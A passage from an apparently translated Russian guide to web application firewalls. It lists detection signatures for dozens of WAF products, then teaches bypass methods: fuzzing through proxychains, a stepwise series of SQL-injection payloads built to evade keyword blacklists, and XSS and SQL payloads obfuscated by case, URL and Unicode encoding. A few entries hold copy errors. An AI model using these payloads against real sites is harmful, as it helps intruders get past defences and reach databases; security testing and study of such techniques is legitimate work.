      • Ссылка на URL http://www.eeye.com/SecureIIS/.
      • Фрагмент текста SecureIIS Error.
SecureSphere
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница ответа содержит следующий фрагмент текста:
      • Ошибка в тексте h2.
      • Заголовок содержит только текст Error.
      • Текст Contact support for additional information..
SEnginx
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ключевое слово SENGINX-ROBOT-MITIGATION.
ServerDefender VP
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заблокированный ответ содержит поле заголовка X-Pint с ключевым словом p80.
Shadow Daemon
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ключевое слово request forbidden by administrative rules..
ShieldSecurity
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • Текст You were blocked by the Shield..
      • Фрагмент текста Something in the URL, Form or Cookie data wasn't appropriate.
      • Warning: You have {number} remaining transgression(s) against this site.
      • Seriously stop repeating what you are doing or you will be locked out.
SiteGround
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница заблокированного ответа содержит
      фрагмент текста The page you are trying to access is restricted due to a security rule.
SiteGuard (JP Secure)
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Страница ответа содержит:
      • Фрагмент текста Powered by SiteGuard.
      • Фрагмент текста The server refuse to browse the page..
      • The URL may not be correct. Please confirm the value.
SiteLock TrueShield
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Исходный код страницы заблокированного ответа содержит следующее:
      • Ссылка на URL www.sitelock.com.
      • Текст Sitelock is leader in Business Website Security Services..
      • Ключевое слово sitelock-site-verification.
      • Изображение sitelock_shield_logo.
SonicWall
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит значение ключевого слова SonicWALL.
    • Страница заблокированного ответа содержит один из следующих фрагментов текста:
      • Изображение с логотипом Dell.
      • This request is blocked by the SonicWALL.
      • Фрагмент текста Web Site Blocked.
      • Ключевое слово nsa_banner. :p
Sophos UTM
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ключевое слово Powered by UTM Web Protection.
SquareSpace
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • При вредоносных запросах возвращается код ответа 404 Not Found.
    • Страница заблокированного ответа содержит один из следующих фрагментов текста:
      • Ключевое слово BRICK-50.
      • Фрагмент текста 404 Not Found.
SquidProxy IDS
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит значение поля squid/{version}.
    • Страница заблокированного ответа содержит
      Access control configuration prevents your request from being allowed at this time..
StackPath
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержит изображение с логотипом StackPath.
    • Страница заблокированного ответа содержит
      You performed an action that triggered the service and blocked your request.
Stingray
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Заблокированный ответ возвращает код 403 Forbidden или 500 Internal Error.
    • Заголовки ответа содержат имя поля заголовка X-Mapping.
Sucuri CloudProxy
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа могут содержать ключевые слова Sucuri или Cloudproxy.
    • Страница заблокированного ответа содержит следующий фрагмент текста:
      • Текст Access Denied - Sucuri Website Firewall.
      • Ссылка на URL https://sucuri.net/privacy-policy.
      • Иногда email [email protected].
      • Содержит уведомление об авторских правах ;copy {year} Sucuri Inc.
    • Заголовки ответа содержат заголовок X-Sucuri-ID вместе с обычными запросами.
Synology Cloud
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит текст Copyright (c) 2019 Synology Inc. All rights reserved..
Tencent Cloud
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заблокированный ответ возвращает ошибку 405 Method Not Allowed.
    • Страница заблокированного ответа содержит ссылку на URL waf.tencent-cloud.com.
Teros
  • Обнаруживаемость: Сложная
  • Методика обнаружения:
    • Заголовки ответа содержат поле cookie st8id.
TrafficShield
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовок Server может содержать ключевое слово F5-TrafficShield.
    • Значение ASINFO= может быть обнаружено в файлах cookie ответа.
TransIP
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат уникальный заголовок X-TransIP-Backend.
    • Заголовки ответа содержат другой заголовок X-TransIP-Balancer.
UCloud UEWaf
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Содержимое ответа может содержать:
      • Ссылку на каталог URL /uewaf_deny_pages/default/img/.
      • URL ucloud.cn.
    • Возвращаемые заголовки ответа имеют заголовок Server, установленный в uewaf/{version}.
URLMaster SecurityCheck
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа могут содержать:
      • Ключевое слово UrlMaster.
      • Ключевое слово UrlRewriteModule.
      • Ключевое слово SecurityCheck.
    • Заблокированный ответ возвращает фрагмент текста 400 Bad Request.
URLScan
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Страница заблокированного ответа содержит:
      • Фрагмент текста Rejected-by-URLScan.
      • Заголовок Server Erro in Application.
      • Module: IIS Web Core в таблице.
USP Secure Entry
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки ответа содержат значение поля Secure Entry Server.
Varnish (OWASP)
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Вредоносный запрос возвращает ошибку 404 Not Found.
    • Страница ответа содержит:
      • Фрагмент текста Request rejected by xVarnish-WAF.
Varnish CacheWall
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница ответа содержит:
      • Заголовок Error 403 Naughty, not Nice!.
      • Текст Varnish cache Server.
Viettel
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница ответа содержит:
      • Страница блокировки имеет заголовок Access denied · Viettel WAF.
      • Ссылка на URL https://cloudrity.com.vn/.
      • Страница ответа содержит ключевые слова Viettel WAF system.
      • Контактная информация со ссылкой на URL https://cloudrity.com.vn/customer/#/contact.
VirusDie
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница ответа содержит:
      • Изображение http://cdn.virusdie.ru/splash/firewallstop.png.
      • Уведомление об авторских правах copy; Virusdie.ru

        .
      • Заголовок страницы ответа содержит ключевое слово Virusdie.
      • Метаданные страницы содержат ключевое слово name="FW_BLOCK"
WallArm
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Заголовки Server содержат значение nginx-wallarm.
WatchGuard IPS
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки Server могут содержать значение поля WatchGuard.
    • Страница заблокированного ответа содержит:
      • Текст Request denied by WatchGuard Firewall.
      • WatchGuard Technologies Inc. в нижнем колонтитуле.
WebARX Security
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Ограничено только сайтами на WordPress.
    • Страница заблокированного ответа содержит:
      • Текст This request has been blocked by WebARX Web Application Firewall.
      • Ссылка на каталог /wp-content/plugins/webarx/, где он установлен.
WebKnight
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат ключевое слово WebKnight.
    • Страница заблокированного ответа содержит:
      • Текстовое предупреждение WebKnight Application Firewall Alert.
      • Фрагмент текста AQTRONIX WebKnight.
    • Возвращаемый код заблокированного ответа — 999 No Hacking. :p
    • Также возвращается код заблокированного ответа 404 Hack Not Found. :p
WebLand
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово Apache Protected By WebLand WAF.
WebRay
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово WebRay-WAF.
    • Заголовки ответа могут содержать поле DrivedBy со значением RaySrv RayEng/{version}.
WebSEAL
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит ключевое слово WebSEAL.
    • Страница заблокированного ответа содержит:
      • Текст This is a WebSEAL error message template file.
      • Фрагмент текста WebSEAL server received an invalid HTTP request.
WebTotem
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит The current request was blocked by WebTotem.
West263CDN
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат поле заголовка X-Cache со значением WT263CDN.
Wordfence
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат ключевое слово WebKnight.
    • Страница заблокированного ответа содержит:
      • Фрагмент текста Generated by Wordfence.
      • Текстовое предупреждение A potentially unsafe operation has been detected in your request to this site.
      • Текстовое предупреждение Your access to this site has been limited.
      • Фрагмент текста This response was generated by Wordfence.
WTS-WAF
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок страницы заблокированного ответа содержит ключевое слово WTS-WAF.
    • Заголовок Server содержит wts в качестве значения.
XLabs Security WAF
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовки ответа содержат поле заголовка X-CDN со значением XLabs Security.
Xuanwudun WAF
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ссылку на URL сайта http://admin.dbappwaf.cn/index.php/Admin/ClientMisinform/.
Yunaq Chuangyu
  • Обнаруживаемость: Средняя
  • Методика обнаружения:
    • Страница ответа содержит ссылку на:
      • URL 365cyd.com или 365cyd.net.
      • Ссылку на страницу справки по адресу http://help.365cyd.com/cyd-error-help.html?code=403.
Yundun
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server содержит YUNDUN в качестве значения.
    • Поле заголовка X-Cache содержит YUNDUN в качестве значения.
    • Страница ответа содержит фрагмент текста Blocked by YUNDUN Cloud WAF.
    • Страница заблокированного ответа содержит ссылку на URL yundun.com/yd_http_error/.
Yunsuo
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ссылку на класс изображения yunsuologo.
    • Заголовки ответа содержат имя поля yunsuo_session.
YxLink
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Ответ может содержать поле cookie yx_ci_session.
    • Ответ может содержать поле cookie yx_language.
    • Заголовок Server содержит значение поля Yxlink-WAF.
ZenEdge
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Страница заблокированного ответа содержит ссылку на каталог /__zenedge/assets/.
    • Заголовок Server содержит ключевое слово ZENEDGE.
    • Заголовки заблокированного ответа могут содержать заголовок X-Zen-Fury.
ZScaler
  • Обнаруживаемость: Легко
  • Методика обнаружения:
    • Заголовок Server имеет значение ZScaler.
    • Страница заблокированного ответа содержит:
      • Текст Access Denied: Accenture Policy.
      • Ссылку на URL https://policies.accenture.com.
      • Ссылку на изображение https://login.zscloud.net/img_logo_new1.png.
      • Your organization has selected Zscaler to protect you from internet threats.
      • The Internet site you have attempted to access is prohibited. Accenture's webfilters indicate that the site likely contains content considered inappropriate.

Фаззинг/Брутфорс:

Метод:

Запуск набора payloads против URL/конечной точки. Некоторые хорошие словари для фаззинга:

  • Словари, специально предназначенные для фаззинга
    • Seclists/Fuzzing.
    • Fuzz-DB/Attack
    • Other Payloads

Техника:

  • Загрузите ваш словарь в фаззер и начните брутфорс.
  • Записывайте/логируйте все ответы от различных профазженных payloads.
  • Используйте случайные user-agents, от Chrome Desktop до браузера iPhone.
  • Если замечена блокировка, увеличьте задержку фаззинга (напр., 2-4 сек).
  • Всегда используйте proxychains, так как велика вероятность, что ваш IP будет заблокирован.

Недостатки:

  • Этот метод часто терпит неудачу.
  • Много раз ваш IP будет заблокирован (временно/постоянно).

Обратная разработка регулярных выражений (Regex Reversing):

Метод:

  • Самый эффективный метод обхода WAF.
  • Некоторые WAF полагаются на сопоставление атакующих payloads с сигнатурами в своих базах данных.
  • Если payload соответствует регулярному выражению, WAF срабатывает.

Техники:

Обнаружение/обход черных списков (Blacklisting Detection/Bypass)

  • В этом методе мы пытаемся пошагово определить правила, наблюдая за ключевыми словами, попавшими в черный список.
  • Идея заключается в том, чтобы угадать регулярное выражение и создать следующий payload, который не использует заблокированные ключевые слова.

Пример: SQL-инъекция

• Шаг 1:

Отфильтрованные ключевые слова: and, or, union
Вероятное регулярное выражение: preg_match('/(and|or|union)/i', $id)

  • Заблокированная попытка: union select user, password from users
  • Обойденная инъекция: 1 || (select user from users where user_id = 1) = 'admin'
• Шаг 2:

Отфильтрованные ключевые слова: and, or, union, where

  • Заблокированная попытка: 1 || (select user from users where user_id = 1) = 'admin'
  • Обойденная инъекция: 1 || (select user from users limit 1) = 'admin'
• Шаг 3:

Отфильтрованные ключевые слова: and, or, union, where, limit

  • Заблокированная попытка: 1 || (select user from users limit 1) = 'admin'
  • Обойденная инъекция: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
• Шаг 4:

Отфильтрованные ключевые слова: and, or, union, where, limit, group by

  • Заблокированная попытка: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  • Обойденная инъекция: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
• Шаг 5:

Отфильтрованные ключевые слова: and, or, union, where, limit, group by, select

  • Заблокированная попытка: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • Обойденная инъекция: 1 || 1 = 1 into outfile 'result.txt'
  • Обойденная инъекция: 1 || substr(user,1,1) = 'a'
• Шаг 6:

Отфильтрованные ключевые слова: and, or, union, where, limit, group by, select, '

  • Заблокированная попытка: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  • Обойденная инъекция: 1 || user_id is not null
  • Обойденная инъекция: 1 || substr(user,1,1) = 0x61
  • Обойденная инъекция: 1 || substr(user,1,1) = unhex(61)
• Шаг 7:

Отфильтрованные ключевые слова: and, or, union, where, limit, group by, select, ', hex

  • Заблокированная попытка: 1 || substr(user,1,1) = unhex(61)
  • Обойденная инъекция: 1 || substr(user,1,1) = lower(conv(11,10,36))
• Шаг 8:

Отфильтрованные ключевые слова: and, or, union, where, limit, group by, select, ', hex, substr

  • Заблокированная попытка: 1 || substr(user,1,1) = lower(conv(11,10,36))
  • Обойденная инъекция: 1 || lpad(user,7,1)
• Шаг 9:

Отфильтрованные ключевые слова: and, or, union, where, limit, group by, select, ', hex, substr, пробелы

  • Заблокированная попытка: 1 || lpad(user,7,1)
  • Обойденная инъекция: 1%0b||%0blpad(user,7,1)

Обфускация:

Метод:

  • Кодирование payload в различные кодировки (метод проб и ошибок).
  • Вы можете закодировать весь payload или его часть и тестировать рекурсивно.

Техники:

1. Переключение регистра (Case Toggling)

  • Некоторые плохо разработанные WAF фильтруют только определенный регистр.
  • Мы можем комбинировать символы верхнего и нижнего регистра для создания эффективных payload.

Стандартный: <script>alert()</script>
Обойденный: <ScRipT>alert()</sCRipT>

Стандартный: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Обойденный: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

2. URL-кодирование

  • Кодируйте обычные payload с помощью %-кодирования/URL-кодирования.
  • Можно выполнить с помощью онлайн-инструментов, например этого.
  • Burp включает встроенный кодировщик/декодировщик.

Заблокированный: <svG/x=">"/oNloaD=confirm()//
Обойденный: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

Заблокированный: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
Обойденный: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Нормализация Unicode

  • Символы ASCII в кодировке Unicode предоставляют отличные варианты для обхода.
  • Вы можете закодировать весь payload или его часть для получения результатов.

Стандартный: <marquee onstart=prompt()>
Обфусцированный: <marquee onstart=\u0070r\u06f\u006dpt()>

Заблокированный: /?redir=http://google.com


Read more